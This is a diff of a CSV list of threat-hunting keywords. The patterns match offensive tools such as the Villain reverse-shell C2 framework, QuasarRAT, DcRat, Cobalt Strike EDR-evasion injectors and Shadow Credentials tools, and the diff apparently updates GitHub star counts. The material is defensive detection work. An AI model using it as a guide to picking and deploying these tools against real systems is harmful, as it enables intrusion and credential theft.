APT29","C2","https://github.com/Gality369/CS-Loader","1","1","N/A","10","10","751","149","2021-08-11T06:43:52Z","2020-08-17T21:33:06Z" -"*python3_reverse_tcp.py*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3252","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" -"*python3_reverse_tcp_v2.py*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3252","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" +"*python3_reverse_tcp.py*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" +"*python3_reverse_tcp_v2.py*","offensive_tool_keyword","Villain","Villain is a C2 framework that can handle multiple TCP socket & HoaxShell-based reverse shells. enhance their functionality with additional features (commands. utilities etc) and share them among connected sibling servers (Villain instances running on different machines).","T1021 - T1043 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/t3l3machus/Villain","1","1","N/A","10","10","3255","534","2023-08-08T06:24:24Z","2022-10-25T22:02:59Z" "*pywerview.py*","offensive_tool_keyword","pywerview","A partial Python rewriting of PowerSploit PowerView","T1069.002 - T1018 - T1087.001 - T1033 - T1069.001 - T1087.002 - T1016 - T1482","TA0007 - TA0009","N/A","N/A","Reconnaissance","https://github.com/the-useless-one/pywerview","1","1","N/A","N/A","8","738","102","2023-10-02T14:57:20Z","2016-07-06T13:25:09Z" "*pywhisker.py -*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" "*pywhisker.py*","offensive_tool_keyword","pywhisker","Python version of the C# tool for Shadow Credentials attacks","T1552.001 - T1136 - T1098","TA0003 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/pywhisker","1","1","N/A","10","5","418","49","2023-10-03T14:10:17Z","2021-07-21T19:20:00Z" "*pywhisker-main*","offensive_tool_keyword","pywhisker","Python version of the C# tool for Shadow Credentials attacks","T1552.001 - T1136 - T1098","TA0003 - TA0004 - TA0005","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/pywhisker","1","1","N/A","10","5","418","49","2023-10-03T14:10:17Z","2021-07-21T19:20:00Z" "*pywsus.py*","offensive_tool_keyword","pywsus","The main goal of this tool is to be a standalone implementation of a legitimate WSUS server which sends malicious responses to clients. The MITM attack itself should be done using other dedicated tools such as Bettercap.","T1505.003 - T1001.001 - T1560.001 - T1071.001","TA0003 - TA0011 - TA0002","N/A","N/A","Network Exploitation tools","https://github.com/GoSecure/pywsus","1","1","N/A","N/A","3","248","38","2022-11-11T19:59:21Z","2020-08-11T21:44:35Z" "*Q29iYWx0IFN0cmlrZSBFeHRlcm5hbCBDMiBMb2FkZXI=*","offensive_tool_keyword","C2 related tools","Cooolis-ms is a code execution tool that includes Metasploit Payload Loader. Cobalt Strike External C2 Loader. and Reflective DLL injection. Its positioning is to avoid some codes that we will execute and contain characteristics in static killing. and help red team personnel It is more convenient and quick to switch from the Web container environment to the C2 environment for further work.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","N/A","C2","https://github.com/Rvn0xsy/Cooolis-ms","1","1","N/A","10","10","868","140","2023-05-22T22:18:47Z","2019-03-31T14:23:57Z" -"*qtc-de/remote-method-guesser*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","1","N/A","6","8","708","118","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" +"*qtc-de/remote-method-guesser*","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","1","N/A","6","8","709","120","2023-10-03T06:22:32Z","2019-11-04T11:37:38Z" "*QUAPCInjectAsSystem*","offensive_tool_keyword","cobaltstrike","EDR Evasion - Combination of SwampThing - TikiTorch","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rkervella/CarbonMonoxide","1","1","N/A","10","10","21","12","2020-05-28T10:40:20Z","2020-05-15T09:32:25Z" "*QUAPCInjectElevated*","offensive_tool_keyword","cobaltstrike","EDR Evasion - Combination of SwampThing - TikiTorch","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rkervella/CarbonMonoxide","1","1","N/A","10","10","21","12","2020-05-28T10:40:20Z","2020-05-15T09:32:25Z" "*QUAPCInjectFakecmd*","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","10","10","741","147","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z" "*QUAPCInjectFakecmd*","offensive_tool_keyword","cobaltstrike","EDR Evasion - Combination of SwampThing - TikiTorch","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rkervella/CarbonMonoxide","1","1","N/A","10","10","21","12","2020-05-28T10:40:20Z","2020-05-15T09:32:25Z" "*QUAPCInjectWithoutPid*","offensive_tool_keyword","cobaltstrike","EDR Evasion - Combination of SwampThing - TikiTorch","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/rkervella/CarbonMonoxide","1","1","N/A","10","10","21","12","2020-05-28T10:40:20Z","2020-05-15T09:32:25Z" -"*Quasar.Client.*","offensive_tool_keyword","QuasarRAT","Free. Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface. Quasar is the perfect remote administration solution for you.","T1071.001 - T1021.002 - T1059.003 - T1105 - T1053.005 - T1012 - T1060","TA0011 - TA0005 - TA0003 - TA0007 - TA0006 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/quasar/Quasar","1","1","N/A","N/A","10","7281","2269","2023-09-06T10:53:31Z","2014-07-08T12:27:59Z" -"*Quasar.exe*","offensive_tool_keyword","QuasarRAT","Free. Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface. Quasar is the perfect remote administration solution for you.","T1071.001 - T1021.002 - T1059.003 - T1105 - T1053.005 - T1012 - T1060","TA0011 - TA0005 - TA0003 - TA0007 - TA0006 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/quasar/Quasar","1","1","N/A","N/A","10","7281","2269","2023-09-06T10:53:31Z","2014-07-08T12:27:59Z" -"*Quasar.Server*","offensive_tool_keyword","QuasarRAT","Free. Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface. Quasar is the perfect remote administration solution for you.","T1071.001 - T1021.002 - T1059.003 - T1105 - T1053.005 - T1012 - T1060","TA0011 - TA0005 - TA0003 - TA0007 - TA0006 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/quasar/Quasar","1","0","N/A","N/A","10","7281","2269","2023-09-06T10:53:31Z","2014-07-08T12:27:59Z" -"*Quasar.sln*","offensive_tool_keyword","QuasarRAT","Free. Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface. Quasar is the perfect remote administration solution for you.","T1071.001 - T1021.002 - T1059.003 - T1105 - T1053.005 - T1012 - T1060","TA0011 - TA0005 - TA0003 - TA0007 - TA0006 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/quasar/Quasar","1","1","N/A","N/A","10","7281","2269","2023-09-06T10:53:31Z","2014-07-08T12:27:59Z" -"*quasar/Quasar*","offensive_tool_keyword","QuasarRAT","Free. Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface. Quasar is the perfect remote administration solution for you.","T1071.001 - T1021.002 - T1059.003 - T1105 - T1053.005 - T1012 - T1060","TA0011 - TA0005 - TA0003 - TA0007 - TA0006 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/quasar/Quasar","1","1","N/A","N/A","10","7281","2269","2023-09-06T10:53:31Z","2014-07-08T12:27:59Z" -"*Quasar-master.zip*","offensive_tool_keyword","QuasarRAT","Free. Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface. Quasar is the perfect remote administration solution for you.","T1071.001 - T1021.002 - T1059.003 - T1105 - T1053.005 - T1012 - T1060","TA0011 - TA0005 - TA0003 - TA0007 - TA0006 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/quasar/Quasar","1","1","N/A","N/A","10","7281","2269","2023-09-06T10:53:31Z","2014-07-08T12:27:59Z" -"*QuasarRAT*","offensive_tool_keyword","QuasarRAT","Free. Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface. Quasar is the perfect remote administration solution for you.","T1071.001 - T1021.002 - T1059.003 - T1105 - T1053.005 - T1012 - T1060","TA0011 - TA0005 - TA0003 - TA0007 - TA0006 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/quasar/Quasar","1","1","N/A","N/A","10","7281","2269","2023-09-06T10:53:31Z","2014-07-08T12:27:59Z" +"*Quasar.Client.*","offensive_tool_keyword","QuasarRAT","Free. Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface. Quasar is the perfect remote administration solution for you.","T1071.001 - T1021.002 - T1059.003 - T1105 - T1053.005 - T1012 - T1060","TA0011 - TA0005 - TA0003 - TA0007 - TA0006 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/quasar/Quasar","1","1","N/A","N/A","10","7283","2269","2023-09-06T10:53:31Z","2014-07-08T12:27:59Z" +"*Quasar.exe*","offensive_tool_keyword","QuasarRAT","Free. Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface. Quasar is the perfect remote administration solution for you.","T1071.001 - T1021.002 - T1059.003 - T1105 - T1053.005 - T1012 - T1060","TA0011 - TA0005 - TA0003 - TA0007 - TA0006 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/quasar/Quasar","1","1","N/A","N/A","10","7283","2269","2023-09-06T10:53:31Z","2014-07-08T12:27:59Z" +"*Quasar.Server*","offensive_tool_keyword","QuasarRAT","Free. Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface. Quasar is the perfect remote administration solution for you.","T1071.001 - T1021.002 - T1059.003 - T1105 - T1053.005 - T1012 - T1060","TA0011 - TA0005 - TA0003 - TA0007 - TA0006 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/quasar/Quasar","1","0","N/A","N/A","10","7283","2269","2023-09-06T10:53:31Z","2014-07-08T12:27:59Z" +"*Quasar.sln*","offensive_tool_keyword","QuasarRAT","Free. Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface. Quasar is the perfect remote administration solution for you.","T1071.001 - T1021.002 - T1059.003 - T1105 - T1053.005 - T1012 - T1060","TA0011 - TA0005 - TA0003 - TA0007 - TA0006 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/quasar/Quasar","1","1","N/A","N/A","10","7283","2269","2023-09-06T10:53:31Z","2014-07-08T12:27:59Z" +"*quasar/Quasar*","offensive_tool_keyword","QuasarRAT","Free. Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface. Quasar is the perfect remote administration solution for you.","T1071.001 - T1021.002 - T1059.003 - T1105 - T1053.005 - T1012 - T1060","TA0011 - TA0005 - TA0003 - TA0007 - TA0006 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/quasar/Quasar","1","1","N/A","N/A","10","7283","2269","2023-09-06T10:53:31Z","2014-07-08T12:27:59Z" +"*Quasar-master.zip*","offensive_tool_keyword","QuasarRAT","Free. Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface. Quasar is the perfect remote administration solution for you.","T1071.001 - T1021.002 - T1059.003 - T1105 - T1053.005 - T1012 - T1060","TA0011 - TA0005 - TA0003 - TA0007 - TA0006 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/quasar/Quasar","1","1","N/A","N/A","10","7283","2269","2023-09-06T10:53:31Z","2014-07-08T12:27:59Z" +"*QuasarRAT*","offensive_tool_keyword","QuasarRAT","Free. Open-Source Remote Administration Tool for Windows. Quasar is a fast and light-weight remote administration tool coded in C#. The usage ranges from user support through day-to-day administrative work to employee monitoring. Providing high stability and an easy-to-use user interface. Quasar is the perfect remote administration solution for you.","T1071.001 - T1021.002 - T1059.003 - T1105 - T1053.005 - T1012 - T1060","TA0011 - TA0005 - TA0003 - TA0007 - TA0006 - TA0008 - TA0010","N/A","N/A","POST Exploitation tools","https://github.com/quasar/Quasar","1","1","N/A","N/A","10","7283","2269","2023-09-06T10:53:31Z","2014-07-08T12:27:59Z" "*quentinhardy*msdat*","offensive_tool_keyword","MSDAT","MSDAT (Microsoft SQL Database Attacking Tool) is an open source penetration testing tool that tests the security of Microsoft SQL Databases remotely.","T1110 - T1059 - T1210 - T1047","TA0002 - TA0008 - TA0001","N/A","N/A","Exploitation tools","https://github.com/quentinhardy/msdat","1","1","N/A","N/A","8","764","144","2023-08-01T10:54:24Z","2018-02-15T12:34:57Z" "*quser.x64.o*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF for quser.exe implementation using Windows API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/Quser-BOF","1","1","N/A","10","10","78","10","2023-03-22T17:07:02Z","2021-04-01T15:19:50Z" "*quser.x86.o*","offensive_tool_keyword","cobaltstrike","Cobalt Strike BOF for quser.exe implementation using Windows API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/netero1010/Quser-BOF","1","1","N/A","10","10","78","10","2023-03-22T17:07:02Z","2021-04-01T15:19:50Z" -"*qwqdanchun*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","817","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" -"*qwqdanchun/DcRat*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","817","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" +"*qwqdanchun*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","820","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" +"*qwqdanchun/DcRat*","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","C2","https://github.com/qwqdanchun/DcRat","1","1","N/A","10","10","820","352","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z" "*QWRkLU1lbWJlciBOb3RlUHJvcGVydHkgLU5hbWUgVmlydHVhbFByb3RlY3QgLVZhbHVlICRWaXJ0dWFsUHJvdGVjdA*","offensive_tool_keyword","mimikatz","invoke mimiaktz string found used by the tool EDRaser ","T1070.004 - T1027 - T1564.001","TA0005 - TA0040 - TA0003","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/EDRaser","1","1","N/A","10","2","118","16","2023-09-27T13:45:05Z","2023-08-10T04:30:45Z" "*QXh4OEF4eDhBeHg4QXh4OA==*","offensive_tool_keyword","cobaltstrike","ShellCode_Loader - Msf&CobaltStrike Antivirus ShellCode loader. Shellcode_encryption - Antivirus Shellcode encryption generation tool. currently tested for Antivirus 360 & Huorong & Computer Manager & Windows Defender (other antivirus software not tested).","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Axx8/ShellCode_Loader","1","1","N/A","10","10","389","49","2022-09-20T07:24:25Z","2022-09-02T14:41:18Z" "*r00t-3xp10it*","offensive_tool_keyword","Github Username","Pentest hosting multiple offensive tools","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" @@ -15506,31 +15676,31 @@ "*r1cksec/thoth*","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","1","N/A","7","1","75","8","2023-09-27T06:46:46Z","2021-11-15T13:40:56Z" "*r2pm -i dirtycow*","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tools","https://github.com/nowsecure/dirtycow","1","0","N/A","N/A","1","93","30","2019-05-13T13:17:31Z","2016-10-22T14:00:37Z" "*r4wd3r/Suborner*","offensive_tool_keyword","Suborner","The Invisible Account Forger - A simple program to create a Windows account you will only know about ","T1098 - T1175 - T1033","TA0007 - TA0008 - TA0003","N/A","N/A","Persistence","https://github.com/r4wd3r/Suborner","1","1","N/A","N/A","5","452","58","2022-09-02T09:04:46Z","2022-04-26T00:12:58Z" 